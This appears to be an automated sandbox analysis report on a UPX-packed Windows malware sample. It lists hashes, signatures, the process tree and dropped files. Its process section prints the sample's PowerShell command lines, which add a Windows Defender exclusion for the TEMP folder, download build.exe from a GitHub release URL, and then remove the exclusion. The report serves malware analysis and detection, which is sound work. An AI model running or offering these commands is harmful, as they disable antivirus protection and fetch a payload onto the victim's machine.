Analysis
max time kernel: 13s
max time network: 20s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 23/03/2025, 02:34
Behavioral task: behavioral1
  Sample: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
  Resource: win10v2004-20250314-en
General
Target: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Size: 57KB
MD5: 16edd47bf01716b24958a0b3a3a7bcfb
SHA1: 8b7972f4190c2ca9d600084611e966fa0f899b98
SHA256: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
SHA512: 9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
SSDEEP: 768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell
  pid   Process
  2960  powershell.exe
  3036  powershell.exe

YARA rule matches
  resource                                                                     yara_rule
  behavioral1/memory/2460-0-0x0000000140000000-0x0000000140028000-memory.dmp   upx
  behavioral1/memory/2460-29-0x0000000140000000-0x0000000140028000-memory.dmp  upx

Hide Artifacts: Ignore Process Interrupts (1 TTPs, 2 IoCs)
Command interpreters often include specific commands/flags that ignore errors and other hangups.
  pid   Process
  2960  powershell.exe
  2748  powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  2960  powershell.exe
  3036  powershell.exe
  2748  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2960  powershell.exe
  Token: SeDebugPrivilege  3036  powershell.exe
  Token: SeDebugPrivilege  2748  powershell.exe

Suspicious use of WriteProcessMemory (18 IoCs)
  description                          pid   Process                                                                 procid_target
  PID 2460 wrote to memory of 2840     2460  568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe   30
  PID 2460 wrote to memory of 2840     2460  568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe   30
  PID 2460 wrote to memory of 2840     2460  568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe   30
  PID 2840 wrote to memory of 2860     2840  cmd.exe                                                                 31
  PID 2840 wrote to memory of 2860     2840  cmd.exe                                                                 31
  PID 2840 wrote to memory of 2860     2840  cmd.exe                                                                 31
  PID 2860 wrote to memory of 2940     2860  net.exe                                                                 32
  PID 2860 wrote to memory of 2940     2860  net.exe                                                                 32
  PID 2860 wrote to memory of 2940     2860  net.exe                                                                 32
  PID 2840 wrote to memory of 2960     2840  cmd.exe                                                                 33
  PID 2840 wrote to memory of 2960     2840  cmd.exe                                                                 33
  PID 2840 wrote to memory of 2960     2840  cmd.exe                                                                 33
  PID 2840 wrote to memory of 3036     2840  cmd.exe                                                                 34
  PID 2840 wrote to memory of 3036     2840  cmd.exe                                                                 34
  PID 2840 wrote to memory of 3036     2840  cmd.exe                                                                 34
  PID 2840 wrote to memory of 2748     2840  cmd.exe                                                                 35
  PID 2840 wrote to memory of 2748     2840  cmd.exe                                                                 35
  PID 2840 wrote to memory of 2748     2840  cmd.exe                                                                 35
Processes
C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
  - Suspicious use of WriteProcessMemory
  PID: 2460

    C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EC81.tmp\EC91.tmp\EC92.bat C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
      - Suspicious use of WriteProcessMemory
      PID: 2840

        C:\Windows\system32\net.exe
          Command line: net session
          - Suspicious use of WriteProcessMemory
          PID: 2860

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 session
              PID: 2940

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          - Command and Scripting Interpreter: PowerShell
          - Hide Artifacts: Ignore Process Interrupts
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2960

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3036

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          - Hide Artifacts: Ignore Process Interrupts
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2748
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
MD5: 1c935ef28fdfd394b770d945d7f04d76
SHA1: 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256: aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512: a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AXNG9EAC24HR6UTSJ3JV.temp
Filesize: 7KB
MD5: 5717709e6a17b879373cd2411ce9245a
SHA1: c90eba58597d20c849f3d456097e28572aa9f4d1
SHA256: b7927b804f64446b76ff7e091128501068b1e1f816516dd73b41815274d95556
SHA512: f2f0ecf41184063346e3d63ff9c297c43dea70950f58952246ed6bf384b5ae66f5eeb61cd423d8a5677aed20c13dd0bd4cbe7ea96904d4a2056a72b3759ea490